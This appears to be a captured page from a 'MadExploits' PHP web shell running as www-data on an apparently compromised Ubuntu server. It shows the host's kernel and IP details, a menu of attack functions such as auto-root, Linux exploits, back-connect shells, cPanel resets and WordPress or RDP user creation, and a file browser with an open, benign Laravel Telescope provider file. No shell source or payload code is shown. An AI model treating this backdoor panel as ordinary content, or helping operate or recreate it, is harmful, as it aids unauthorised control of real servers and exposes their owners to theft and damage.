Linux 5474007-topit 5.15.0-126-generic #136-Ubuntu SMP Wed Nov 6 10:38:22 UTC 2024 x86_64
Apache/2.4.52 (Ubuntu)
: 85.198.82.39 | : 216.73.216.129
Cant Read [ /etc/named.conf ]
8.3.30
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
back /
app /
Providers /
[ HOME SHELL ]
Name
Size
Permission
Action
AppServiceProvider.php
806
B
-rw-r--r--
CqrsServiceProvider.php
1.19
KB
-rw-r--r--
TelescopeServiceProvider.php
1.55
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : TelescopeServiceProvider.php
<?php declare(strict_types=1); namespace App\Providers; use Illuminate\Support\Facades\Gate; use Laravel\Telescope\IncomingEntry; use Laravel\Telescope\Telescope; use Laravel\Telescope\TelescopeApplicationServiceProvider; class TelescopeServiceProvider extends TelescopeApplicationServiceProvider { /** * Register any application services. */ public function register(): void { // Telescope::night(); $this->hideSensitiveRequestDetails(); $isLocal = $this->app->environment('local'); Telescope::filter(fn (IncomingEntry $entry) => $isLocal || $entry->isReportableException() || $entry->isFailedRequest() || $entry->isFailedJob() || $entry->isScheduledTask() || $entry->hasMonitoredTag()); } /** * Prevent sensitive request details from being logged by Telescope. */ protected function hideSensitiveRequestDetails(): void { if ($this->app->environment('local')) { return; } Telescope::hideRequestParameters(['_token']); Telescope::hideRequestHeaders([ 'cookie', 'x-csrf-token', 'x-xsrf-token', ]); } /** * Register the Telescope gate. * * This gate determines who can access Telescope in non-local environments. */ protected function gate(): void { Gate::define('viewTelescope', fn ($user) => in_array($user->email, [ // ], true)); } }
Close